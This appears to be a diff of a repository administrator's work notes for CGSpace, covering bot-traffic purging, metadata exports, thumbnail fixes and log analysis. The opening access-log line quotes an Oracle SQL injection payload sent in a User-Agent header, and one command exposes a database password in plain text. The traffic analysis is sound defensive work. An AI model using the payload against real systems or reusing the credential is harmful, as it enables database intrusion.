<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] &#34;GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1&#34; 200 1157807 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf&#34; &#34;Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] &#34;GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1&#34; 200 1157807 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf&#34; &#34;Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917&#34;
</span></span></code></pre></div><ul>
<li>3.225.28.105 made 3,000 requests mostly for one CIAT collection on the REST API and it is owned by Amazon
<ul>
<li>The user agent is sometimes a normal user one, and sometimes <code>Apache-HttpClient/4.3.4 (java 1.5)</code></li>
@ -202,27 +202,27 @@ sys 2m51.573s
<li>217.182.21.193 made 2,400 requests and is on OVH</li>
<li>I purged these hits</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 26817 hits from 64.39.98.40 in statistics
Purging 9446 hits from 45.134.26.171 in statistics
Purging 6490 hits from 3.225.28.105 in statistics
Purging 11949 hits from 217.182.21.193 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 54702
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
</span></span><span style="display:flex;"><span>Purging 26817 hits from 64.39.98.40 in statistics
</span></span><span style="display:flex;"><span>Purging 9446 hits from 45.134.26.171 in statistics
</span></span><span style="display:flex;"><span>Purging 6490 hits from 3.225.28.105 in statistics
</span></span><span style="display:flex;"><span>Purging 11949 hits from 217.182.21.193 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 54702
</span></span></code></pre></div><ul>
<li>Export donors and affiliations from CGSpace database:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
COPY 1036
localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
COPY 7901
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 1036
</span></span><span style="display:flex;"><span>localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 7901
</span></span></code></pre></div><ul>
<li>Then check matches against the latest ROR dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> &gt; /tmp/2022-02-02-donors.txt
$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
...
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> &gt; /tmp/2022-02-02-donors.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
<li>I see we have 258/1036 (24.9%) of our donors matching ROR (as of the 2021-09-23 ROR dump)</li>
<li>I see we have 1986/7901 (25.1%) of our affiliations matching ROR (as of the 2021-09-23 ROR dump)</li>
<li>Update the PostgreSQL JDBC driver to 42.3.2 in the Ansible Infrastructure playbooks and deploy on DSpace Test</li>
@ -245,37 +245,37 @@ $ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json
<li>I synchronized DSpace Test with a fresh snapshot of CGSpace</li>
<li>I noticed a bunch of thumbnails missing for items submitted in the last week on CGSpace so I ran the <code>dspace filter-media</code> script manually and eventually it crashed:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media
...
SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.txt&#39; already exists
Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.jpg&#39; already exists
File: Agreement_on_the_Estab_of_ILRI.doc.txt
Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
at org.textmining.extraction.word.model.FormattedDiskPage.&lt;init&gt;(FormattedDiskPage.java:66)
at org.textmining.extraction.word.model.CHPFormattedDiskPage.&lt;init&gt;(CHPFormattedDiskPage.java:62)
at org.textmining.extraction.word.model.CHPBinTable.&lt;init&gt;(CHPBinTable.java:70)
at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.txt&#39; already exists
</span></span><span style="display:flex;"><span>Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
</span></span><span style="display:flex;"><span>SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.jpg&#39; already exists
</span></span><span style="display:flex;"><span>File: Agreement_on_the_Estab_of_ILRI.doc.txt
</span></span><span style="display:flex;"><span>Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
</span></span><span style="display:flex;"><span>java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.model.FormattedDiskPage.&lt;init&gt;(FormattedDiskPage.java:66)
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.model.CHPFormattedDiskPage.&lt;init&gt;(CHPFormattedDiskPage.java:62)
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.model.CHPBinTable.&lt;init&gt;(CHPBinTable.java:70)
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
</span></span><span style="display:flex;"><span> at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
</span></span><span style="display:flex;"><span> at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>I should look up that issue and report a bug somewhere perhaps, but for now I just forced the JPG thumbnails with:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -v &gt;&amp; /tmp/filter-media.log
</code></pre></div><h2 id="2022-02-04">2022-02-04</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -v &gt;&amp; /tmp/filter-media.log
</span></span></code></pre></div><h2 id="2022-02-04">2022-02-04</h2>
<ul>
<li>I found a thread on the dspace-tech mailing list about the <code>media-filter</code> crash above
<ul>
@ -284,14 +284,14 @@ java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([B
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -i 10568/67391 -p <span style="color:#e6db74">&#34;Word Text Extractor&#34;</span> -v
The following MediaFilters are enabled:
Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
org.dspace.app.mediafilter.PoiWordFilter
File: Agreement_on_the_Estab_of_ILRI.doc.txt
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created &#39;Agreement_on_the_Estab_of_ILRI.doc.txt&#39;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -i 10568/67391 -p <span style="color:#e6db74">&#34;Word Text Extractor&#34;</span> -v
</span></span><span style="display:flex;"><span>The following MediaFilters are enabled:
</span></span><span style="display:flex;"><span>Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
</span></span><span style="display:flex;"><span>org.dspace.app.mediafilter.PoiWordFilter
</span></span><span style="display:flex;"><span>File: Agreement_on_the_Estab_of_ILRI.doc.txt
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created &#39;Agreement_on_the_Estab_of_ILRI.doc.txt&#39;
</span></span></code></pre></div><ul>
<li>Meeting with the repositories working group to discuss issues moving forward in the One CGIAR</li>
</ul>
<h2 id="2022-02-07">2022-02-07</h2>
@ -302,20 +302,20 @@ File: Agreement_on_the_Estab_of_ILRI.doc.txt
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">or(
isNotNull(value.match(&#39;1&#39;)),
isNotNull(value.match(&#39;4&#39;)),
isNotNull(value.match(&#39;5&#39;)),
isNotNull(value.match(&#39;6&#39;)),
isNotNull(value.match(&#39;8&#39;)),
...
sNotNull(value.match(&#39;178&#39;)),
isNotNull(value.match(&#39;186&#39;)),
isNotNull(value.match(&#39;188&#39;)),
isNotNull(value.match(&#39;189&#39;)),
isNotNull(value.match(&#39;197&#39;))
)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;1&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;4&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;5&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;6&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;8&#39;)),
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>sNotNull(value.match(&#39;178&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;186&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;188&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;189&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;197&#39;))
</span></span><span style="display:flex;"><span>)
</span></span></code></pre></div><ul>
<li>Then I flagged all of these (seventy-five items)&hellip;
<ul>
<li>I decided to flag the deletes instead of star the keeps because there are some items in the original file that we not marked as duplicates so we have to keep those too</li>
@ -323,19 +323,19 @@ isNotNull(value.match(&#39;197&#39;))
</li>
<li>I generated the next batch of 200 items, from IDs 201 to 400, checked them for duplicates, and then added the PDF file names to the CSV for reference:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/2022-02-07-tac-batch2-201-400.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/batch2-filenames.csv
$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv &gt; /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/tac.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/2022-02-07-tac-batch2-201-400.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/batch2-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv &gt; /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
</span></span></code></pre></div><ul>
<li>Then I sent this second batch of items to Gaia to look at</li>
</ul>
<h2 id="2022-02-08">2022-02-08</h2>
<ul>
<li>Create a SAF archive for the first 200 items (IDs 1 to 200) that were <em>not</em> flagged as duplicates and upload them to a <a href="https://dspacetest.cgiar.org/handle/10568/117921">new collection on DSpace Test</a>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-08-tac-batch1-1to200.map
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-08-tac-batch1-1to200.map
</span></span></code></pre></div><ul>
<li>Fix some occurrences of &ldquo;Hammond, Jim&rdquo; to be &ldquo;Hammond, James&rdquo; on CGSpace</li>
<li>Start a full index on AReS</li>
</ul>
@ -355,12 +355,12 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
<ul>
<li>I extract the logs from nginx for yesterday so I can analyze the traffic:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-access.log
# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-rest.log
# awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /tmp/feb9-* | less | sort -u &gt; /tmp/feb9-ips.txt
# wc -l /tmp/feb9-ips.txt
11636 /tmp/feb9-ips.tx
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-access.log
</span></span><span style="display:flex;"><span># zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-rest.log
</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /tmp/feb9-* | less | sort -u &gt; /tmp/feb9-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/feb9-ips.txt
</span></span><span style="display:flex;"><span>11636 /tmp/feb9-ips.tx
</span></span></code></pre></div><ul>
<li>I started resolving them with my <code>resolve-addresses-geoip2.py</code> script</li>
<li>In the mean time I am looking at the requests and I see a new user agent: <code>1science Resolver 1.0.0</code>
<ul>
@ -374,52 +374,52 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
</li>
<li>Looking at the top twenty or so ASNs for the resolved IPs I see lots of bot traffic, but nothing malicious:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
79 24940
89 36908
100 9299
107 2635
110 44546
111 16509
118 7552
120 4837
123 50245
123 55836
147 45899
173 33771
192 39832
202 32934
235 29465
260 15169
466 14618
607 24757
768 714
1214 8075
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span> 79 24940
</span></span><span style="display:flex;"><span> 89 36908
</span></span><span style="display:flex;"><span> 100 9299
</span></span><span style="display:flex;"><span> 107 2635
</span></span><span style="display:flex;"><span> 110 44546
</span></span><span style="display:flex;"><span> 111 16509
</span></span><span style="display:flex;"><span> 118 7552
</span></span><span style="display:flex;"><span> 120 4837
</span></span><span style="display:flex;"><span> 123 50245
</span></span><span style="display:flex;"><span> 123 55836
</span></span><span style="display:flex;"><span> 147 45899
</span></span><span style="display:flex;"><span> 173 33771
</span></span><span style="display:flex;"><span> 192 39832
</span></span><span style="display:flex;"><span> 202 32934
</span></span><span style="display:flex;"><span> 235 29465
</span></span><span style="display:flex;"><span> 260 15169
</span></span><span style="display:flex;"><span> 466 14618
</span></span><span style="display:flex;"><span> 607 24757
</span></span><span style="display:flex;"><span> 768 714
</span></span><span style="display:flex;"><span> 1214 8075
</span></span></code></pre></div><ul>
<li>The same information, but by org name:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
92 Orange
100 Hetzner Online GmbH
100 Philippine Long Distance Telephone Company
107 AUTOMATTIC
110 ALFA TELECOM s.r.o.
111 AMAZON-02
118 Viettel Group
120 CHINA UNICOM China169 Backbone
123 Reliance Jio Infocomm Limited
123 Serverel Inc.
147 VNPT Corp
173 SAFARICOM-LIMITED
192 Opera Software AS
202 FACEBOOK
235 MTN NIGERIA Communication limited
260 GOOGLE
466 AMAZON-AES
607 Ethiopian Telecommunication Corporation
768 APPLE-ENGINEERING
1214 MICROSOFT-CORP-MSN-AS-BLOCK
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span> 92 Orange
</span></span><span style="display:flex;"><span> 100 Hetzner Online GmbH
</span></span><span style="display:flex;"><span> 100 Philippine Long Distance Telephone Company
</span></span><span style="display:flex;"><span> 107 AUTOMATTIC
</span></span><span style="display:flex;"><span> 110 ALFA TELECOM s.r.o.
</span></span><span style="display:flex;"><span> 111 AMAZON-02
</span></span><span style="display:flex;"><span> 118 Viettel Group
</span></span><span style="display:flex;"><span> 120 CHINA UNICOM China169 Backbone
</span></span><span style="display:flex;"><span> 123 Reliance Jio Infocomm Limited
</span></span><span style="display:flex;"><span> 123 Serverel Inc.
</span></span><span style="display:flex;"><span> 147 VNPT Corp
</span></span><span style="display:flex;"><span> 173 SAFARICOM-LIMITED
</span></span><span style="display:flex;"><span> 192 Opera Software AS
</span></span><span style="display:flex;"><span> 202 FACEBOOK
</span></span><span style="display:flex;"><span> 235 MTN NIGERIA Communication limited
</span></span><span style="display:flex;"><span> 260 GOOGLE
</span></span><span style="display:flex;"><span> 466 AMAZON-AES
</span></span><span style="display:flex;"><span> 607 Ethiopian Telecommunication Corporation
</span></span><span style="display:flex;"><span> 768 APPLE-ENGINEERING
</span></span><span style="display:flex;"><span> 1214 MICROSOFT-CORP-MSN-AS-BLOCK
</span></span></code></pre></div><ul>
<li>Most of these are pretty normal except &ldquo;Serverel&rdquo; and Hetzner perhaps, but their user agents are pretending to be normal users so who knows&hellip;</li>
<li>I decided to look in the Solr stats with <code>facet.limit=1000&amp;facet.mincount=1</code> and found a few more definitely non-human agents:
<ul>
@ -439,25 +439,25 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
</li>
<li>I added them to the ILRI override in the DSpace spider list and ran the <code>check-spider-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 234 hits from randint in statistics
Purging 337 hits from Koha in statistics
Purging 1164 hits from scalaj-http in statistics
Purging 1528 hits from scpitspi-rs in statistics
Purging 3050 hits from lua-resty-http in statistics
